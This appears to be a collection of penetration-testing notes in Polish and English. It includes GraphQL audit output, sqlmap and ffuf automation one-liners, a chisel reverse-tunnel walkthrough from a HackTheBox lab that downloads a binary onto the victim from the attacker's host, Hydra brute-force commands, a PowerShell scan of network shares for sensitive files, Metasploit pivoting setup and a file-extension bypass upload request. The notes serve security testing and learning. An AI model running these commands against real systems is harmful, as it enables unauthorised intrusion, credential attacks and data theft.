GraphQL Cop - Security Audit Utility for GraphQL

 GraphQL Cop to małe narzędzie Pythona do uruchamiania typowych testów bezpieczeństwa dla interfejsów API GraphQL. GraphQL Cop jest idealny do przeprowadzania kontroli CI/CD w GraphQL. Jest lekki i obejmuje interesujące kwestie bezpieczeństwa w GraphQL.

GraphQL Cop pozwala odtworzyć wyniki, dostarczając polecenia cURL dla wszelkich zidentyfikowanych luk w zabezpieczeniach.

Writeup odnośnie GraphQL - https://blog.koalasec.co/2500-dollars-in-bounties-hacking-graphql 

https://github.com/dolevf/graphql-cop

└─# python3 graphql-cop.py -t https://sdb.ua/?q=getnciesList                                                                    1 ⨯

[HIGH] Alias Overloading - Alias Overloading with 100+ aliases is allowed (Denial of Service - /graphiql)

[HIGH] Alias Overloading - Alias Overloading with 100+ aliases is allowed (Denial of Service - /playground)

[HIGH] Alias Overloading - Alias Overloading with 100+ aliases is allowed (Denial of Service - /console)

[HIGH] Alias Overloading - Alias Overloading with 100+ aliases is allowed (Denial of Service - /graphql)

[HIGH] Directive Overloading - Multiple duplicated directives allowed in a query (Denial of Service - /graphiql)

[HIGH] Directive Overloading - Multiple duplicated directives allowed in a query (Denial of Service - /playground)

[HIGH] Directive Overloading - Multiple duplicated directives allowed in a query (Denial of Service - /console)

[HIGH] Directive Overloading - Multiple duplicated directives allowed in a query (Denial of Service - /graphql)

[HIGH] Field Duplication - Queries are allowed with 500 of the same repeated field (Denial of Service - /graphiql)

[HIGH] Field Duplication - Queries are allowed with 500 of the same repeated field (Denial of Service - /playground)

[HIGH] Field Duplication - Queries are allowed with 500 of the same repeated field (Denial of Service - /console)

[HIGH] Field Duplication - Queries are allowed with 500 of the same repeated field (Denial of Service - /graphql)

[LOW] Field Suggestions - Field Suggestions are Enabled (Information Leakage - /graphiql)

[LOW] Field Suggestions - Field Suggestions are Enabled (Information Leakage - /playground)

[LOW] Field Suggestions - Field Suggestions are Enabled (Information Leakage - /console)

[LOW] Field Suggestions - Field Suggestions are Enabled (Information Leakage - /graphql)

[HIGH] Introspection - Introspection Query Enabled (Information Leakage - /graphiql)

[HIGH] Introspection - Introspection Query Enabled (Information Leakage - /playground)

[HIGH] Introspection - Introspection Query Enabled (Information Leakage - /console)

[HIGH] Introspection - Introspection Query Enabled (Information Leakage - /graphql)

run ffuf from all domains from file

httpx -list mexico | xargs -I {} sh -c 'clean_url=$(echo {} | sed -e "s|https://|1|g" -e "s|http://|2|g"); ffuf -u {}/FUZZ -w raft-large-words.txt -ac -c -e .txt,.php,.bak,.txt,.rar,.sql,.zip,.php_,.old,.bak,._old,._php  --recursion --recursion-depth 2 >> ffuf-mexico$clean_url' 

Pliki *.js.map

 W aplikacjach webowych pamiętaj aby sprawdzać czy deweloper nie zapomniał o usunięciu plików .js.map.

Szybki skrypt w PHP i zazwyczaj dobry efekt

<?php
/**
 * Created by PhpStorm.
 * User: edwinsturt
 * Date: 2020-06-24
 * Time: 00:45
 */

$file = 'main.ff0058ad.js.map';

if(file_exists($file)) {
    $json = json_decode(file_get_contents($file));

    $directories = [];

    foreach ($json->sources as $index => $source) {

        $dir = dirname($source);
        if (!is_dir($dir)) {
            mkdir($dir, 0755, true);
        }
        $data = explode('/', $source);
        $file = end($data);
        file_put_contents($dir . "/" . $file, $json->sourcesContent[$index]);
        $files[] = $dir . "/" . $file;

    }
    echo "<pre>All Source codes has been extracted from map file ";
    print_r($files);
}
?>

php skrypt.php i witamy env :)

SQLi oneliner automation

 subfinder -d testphp.vulnweb.com -all -silent | gau | urldedupe | gf sqli >sql.txt; sqlmap -m sql.txt --batch --dbs --risk 2 --level 5 --random-agent | tee -a sqli.txt

go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest

go install github.com/lc/gau/v2/cmd/gau@latest

git clone https://github.com/ameenmaali/urldedupe.git;cd urldedupe;cmake CMakeLists.txt;make;cp urldedupe /usr/bin/

go install github.com/tomnomnom/gf@latest;cp ~/go/bin/gf /usr/bin/;mkdir ~/.gf;git clone https://github.com/Sherlock297/gf_patterns.git;cd gf_patterns/;cp *.json ~/.gf;gf -list

Penetration test flutter app

https://github.com/ptswarm/reFlutter

 ❯ pip3 install --upgrade --force-reinstall reflutter

Defaulting to user installation because normal site-packages is not writeable

Collecting reflutter

  Downloading reflutter-0.7.8-py3-none-any.whl.metadata (9.0 kB)

Downloading reflutter-0.7.8-py3-none-any.whl (24 kB)

Installing collected packages: reflutter

  Attempting uninstall: reflutter

    Found existing installation: reflutter 0.7.7

    Uninstalling reflutter-0.7.7:

      Successfully uninstalled reflutter-0.7.7

  WARNING: The script reflutter is installed in '/Users/michal/Library/Python/3.10/bin' which is not on PATH.

  Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.

Successfully installed reflutter-0.7.8

USAGE:

reflutter your.(apk)|(ipa)

❯ /Users/michal/Library/Python/3.10/bin/reflutter 49406.apk

 Choose an option: 

 1. Traffic monitoring and interception 

 2. Display absolute code offset for functions

 [1/2]? 1

Example: (192.168.1.154) etc.

Please enter your BurpSuite IP: 192.168.51.129

 Wait...

SnapshotHash: ee1eb666c76a5cb7746faf39d0b97547

The resulting apk file: ./release.RE.apk

Please sign,align the apk file

Configure Burp Suite proxy server to listen on *:8083

Proxy Tab -> Options -> Proxy Listeners -> Edit -> Binding Tab

Then enable invisible proxying in Request Handling Tab

Support Invisible Proxying -> true

DOWNLOAD:

https://github.com/patrickfav/uber-apk-signer

❯ java -jar uber-apk-signer-1.3.0.jar --apks release.RE.apk

source:

/Users/michal/Downloads

zipalign location: BUILT_IN 

/var/folders/gs/n5db96m941gb7b4ly4r1dw100000gn/T/uapksigner-2589864279722257602/mac-zipalign-33_0_216157554363753981716.tmp

keystore:

[0] 161a0018 /private/var/folders/gs/n5db96m941gb7b4ly4r1dw100000gn/T/temp_3968706172894682738_debug.keystore (DEBUG_EMBEDDED)

01. release.RE.apk

SIGN

file: /Users/michal/Downloads/release.RE.apk (221.2 MiB)

checksum: e28f1257d549f0cb5cfe774a4ad6ffa379be58f91c74aa6630ad720fcafb253a (sha256)

- zipalign success

- sign success

VERIFY

file: /Users/michal/Downloads/release.RE-aligned-debugSigned.apk (221.34 MiB)

checksum: 6504671cfc17578de09c94f90fdd79cf9fd838de633f3b25c25ba865f5dab1d2 (sha256)

- zipalign verified

- signature verified [v3]

Subject: CN=Android Debug, OU=Android, O=US, L=US, ST=US, C=US

SHA256: 1e08a903aef9c3a721510b64ec764d01d3d094eb954161b62544ea8f187b5953 / SHA256withRSA

Expires: Thu Mar 10 21:10:05 CET 2044

[Thu Mar 14 20:07:37 CET 2024][v1.3.0]

Successfully processed 1 APKs and 0 errors in 5.43 seconds.

❯ adb install release.RE-aligned-debugSigned.apk

Performing Incremental Install

Serving...

Success

Install command complete in 527 ms

~/Downloads ❯ All files should be loaded. Notifying the device.    

kampania ataków APT chińskiej grupy hakerów

AhnLab

Wysłane przez kingkimgim , 31 stycznia 2023 r

Dalbit (m00nlight): kampania ataków APT chińskiej grupy hakerów

0. Przegląd

Treść jest rozszerzeniem bloga „Attack Group using FRP (Fast Reverse Proxy) Targeting Domestic Companies”, który został opublikowany 16 sierpnia 2022 r. i śledzi działania grupy.

źródlo: https://asec.ahnlab.com/ko/46431/ 

DOMAIN ADMIN Compromise in 3 HOURS

 https://infosecwriteups.com/domain-admin-compromise-in-3-hours-5778902604c9

apk.sh - ułatwia inżynierię wsteczną aplikacji na Androida

apk.sh to skrypt Bash, który ułatwia inżynierię wsteczną aplikacji na Androida, automatyzując niektóre powtarzalne zadania, takie jak ściąganie, dekodowanie, przebudowywanie i łatanie pliku APK.

Cechy

apk.sh zasadniczo używa apktool do dezasemblacji, dekodowania i odbudowy zasobów oraz trochę basha do automatyzacji procesu wstrzykiwania gadżetów frida . Obsługuje również pakiety aplikacji/podzielone pliki APK.

🍄 Łatanie plików APK w celu załadowania frida-gadget.so na starcie.

🆕 Obsługa pakietów aplikacji/podzielonych plików APK.

🔩 Przebudowywanie zdekodowanych zasobów z powrotem do binarnego pliku APK/JAR za pomocą apktool.

🗝️ Kod podpisując apk za pomocą apksigner.

https://github.com/ax/apk.sh

TCP/UDP reverse tunnel, transported over HTTP, secured via SSH - chisel

#### CHISEL INSTALL

curl https://i.jpillora.com/chisel! | bash

## copy to victim server: 

www-data@passage:/tmp$ wget http://10.10.14.143/chisel

wget http://10.10.14.143/chisel

--2021-01-25 08:55:34--  http://10.10.14.143/chisel

Connecting to 10.10.14.143:80... failed: Connection refused.

www-data@passage:/tmp$ wget http://10.10.14.143:8000/chisel

wget http://10.10.14.143:8000/chisel

--2021-01-25 08:55:47--  http://10.10.14.143:8000/chisel

Connecting to 10.10.14.143:8000... connected.

HTTP request sent, awaiting response... 200 OK

Length: 8704000 (8.3M) [application/octet-stream]

Saving to: 'chisel'

chisel              100%[===================>]   8.30M  5.33MB/s    in 1.6s    

2021-01-25 08:55:49 (5.33 MB/s) - 'chisel' saved [8704000/8704000]

www-data@passage:/tmp$ 

##  my computer:

chisel server -p 9999 --reverse

## victim computer 

./chisel client 10.10.14.143:9999 R:631:localhost:631

##############

hydra -l paul -P /usr/share/wordlists/rockyou.txt -s 631 -f 127.0.0.1 http-get /admin/log/error_log

intercept http2 (grpc) in BURP SUITE PROXY

 as root:

iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d 18.159.107.117 -j REDIRECT --to-port 8080          

adduser mitmproxyuser

cat /etc/nghttpx/nghttpx.conf   (downstream config)

frontend=0.0.0.0,8080;no-tls

backend=127.0.0.1,8081;;proto=http/1.1

backend-keep-alive-timeout=5m

frontend-http2-read-timeout=5m

frontend-read-timeout=5m

frontend-write-timeout=5m

stream-read-timeout=5m

stream-write-timeout=5m

backend-read-timeout=5m

backend-write-timeout=5m

backend-connect-timeout=5m

listener-disable-timeout=5m

backend-http2-window-size=134217720

backend-http2-connection-window-size=1073741760

frontend-http2-window-size=134217720

frontend-http2-connection-window-size=1073741760

http2-proxy=no

private-key-file=/etc/nghttpx/server.key

certificate-file=/etc/nghttpx/server.crt

cacert=/etc/nghttpx/ca.crt

accesslog-syslog=yes

errorlog-syslog=yes

workers=5

cat /etc/nghttpx/upstream.conf   (upstream config)

frontend=127.0.0.1,8082;no-tls

backend=vendor-IP,28900;;no-tls;proto=h2

backend-keep-alive-timeout=5m

frontend-http2-read-timeout=5m

frontend-read-timeout=5m

frontend-write-timeout=5m

stream-read-timeout=5m

stream-write-timeout=5m

backend-read-timeout=5m

backend-write-timeout=5m

backend-connect-timeout=5m

listener-disable-timeout=5m

http2-proxy=no

accesslog-syslog=yes

errorlog-syslog=yes

workers=5

run nghttp as root:

┌──(root💀kali)-[/etc/nghttpx]

└─# nghttpx

2020-12-18T14:38:21.383+01:00 8777 8777 99aaafb4 NOTICE (shrpx.cc:2882) Loading configuration from /etc/nghttpx/nghttpx.conf

run burp suite proxy 127.0.0.1:8081 (invisible proxy)

USER OPTIONS -> Upstream proxy add 127.0.0.1:8082

as mitmproxyuser:

┌──(mitmproxyuser㉿kali)-[/etc/nghttpx]

└─$ nghttpx --conf upstream.conf

2020-12-18T14:42:00.364+01:00 9293 9293 59e630c7 NOTICE (shrpx.cc:2882) Loading configuration from upstream.conf

as root:

run python code (client http2)

How to parse ffuf output file

ffuf -o output_file cat output_file | jq -c '.results[] | {url:.url,status: .status}' for file in dirb/*; do cat $file | jq -c '.results[] | {url:.url,status: .status}'; done

find .git repo!

curl -s "https://crt.sh/?q=%25.domain.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew

Form Feed U+000C

 Znak, który czasami pozwala wyeskejpowac rozszerzenie plików w apkach webowych - •
// http://www.fileformat.info/info/unicode/char/000C/index.htm

POST /api/image_upload HTTP/1.1
Host: X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------91652467232091688581205088441
Content-Length: 631
Connection: close


-----------------------------91652467232091688581205088441
Content-Disposition: form-data; name="file"; filename=".svg•.pdf"
Content-Type: application/pdf

xxx
-----------------------------91652467232091688581205088441--

HTTP/1.1 200 OK

Date: Fri, 03 Jul 2020 08:09:26 GMT

Server: Apache/2

Upgrade: h2,h2c

Connection: Upgrade, close

Vary: Accept-Encoding,User-Agent

Content-Length: 21

Content-Type: text/html

1593763766-94292_.svg

Przeszukiwanie plików z dostępem do odczytu na zasobach - powershell

$REMOTE_HOST = "172.21.56.235"

$FILE_TYPES = "*.pst, *.conf"

net view \\$REMOTE_HOST\ |
ForEach-Object {
    $path = [regex]::match($_, '(.*)       Dysk').Groups[1].Value.Trim()

    if ($path -ne "") {
        Write-Host ("### PATH: " + $path)
        Get-ChildItem -Path \\$REMOTE_HOST\$path -Include $FILE_TYPES -Recurse -ErrorAction Ignore |
        ForEach-Object {
            Try {
                [System.IO.File]::OpenRead($_.FullName).Close()
                Write-Host $_.FullName
            }
            Catch {
                #Write-Host ("Niet: " + $_.FullName)
            }
        }
    }    
}  

//Autor: hagier

Obtaining an IPv6 address from FTP ipv4 using FXP (rfc2428)

One of the tasks from HackTheBox gave me such a puzzle to solve. It is possible. I
spent some time on this because I didn't issue the LIST command. See how it is done correctly :)

OSINT links

https://github.com/jivoi/awesome-osint
https://start.me/p/rxRbpo/ti
https://www.osintdfir.com
https://www.faxvin.com/license-plate-lookup
https://knowem.com/
https://checkusernames.com/
https://stalkscan.com/
https://tineye.com/
https://www.genymotion.com/
Instagram search tool .. https://web.stagram.com/
http://onstrat.com/osint/
https://code.google.com/archive/p/theharvester/
https://docs.google.com/document/d/1BfLPJpRtyq4RFtHJoNpvWQjmGnyVkfE2HYoICKOGguA/edit#heading=h.kmtmtyoi48ch
https://github.com/Ph055a/awesome_osint
https://osintframework.com/

Problem with Metasploit using an SSL Certificate (HandlerSSLCert)

If you want to use your own certificate for metasploit, for example in case windows/meterpreter/reverse_https we should use auxiliary/gather/impersonate_sslbut but earlier change setting openssl in your OS.

in /etc/ssl/openssl.cnf

from
CipherString=DEFAULT@SECLEVEL=2
to 
CipherString=DEFAULT 

Przekazywanie portu w Linux np. dla Metasploit

Podczas atakowania zewnętrznego celu często można spotkać następującą infrastrukturę:
- Komputer A - ofiara
- Komputer B - serwer pośredniczący
- Komputer C - atakujący

W celu przekazania połączenia z A do C należy zastosować przekierowanie portów za pomocą SSH

W tym celu na komputerze B dodać:

do /etc/ssh/sshd_config dodać GatewayPorts yes
i restart sshd

Na komputerze A wykonać polecenie:

ssh -R 8888:localhost:4444 michal@komputer_b -p port_ssh_komputera_b

Na komputerze C uruchomić np multi/handler z
LHOST -> ip_komputera_C
LHOST -> port 4444


Na komputerze B uruchomic ladunek z opcjami:
LHOST -> ip_komputera_B
LHOST -> port 8888

Hydra cheat sheet

Wordpress:

hydra -f -l LOGIN -P /usr/share/wordlists/rockyou.txt www.website.com -S -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&redirect_to=https%3A%2F%2Fwww.website.com%2Fwp-admin%2F&wp-submit=Log In&testcookie=1:S=Location'

Tunel SSH pomiędzy maszyną, a kilkoma sieciami

https://github.com/apenwarr/sshuttle

sshuttle -e "ssh -i file.key" -r w4cky@172.16.0.252 192.168.10.0/24 192.168.11.0/24

nie wymaga roota :)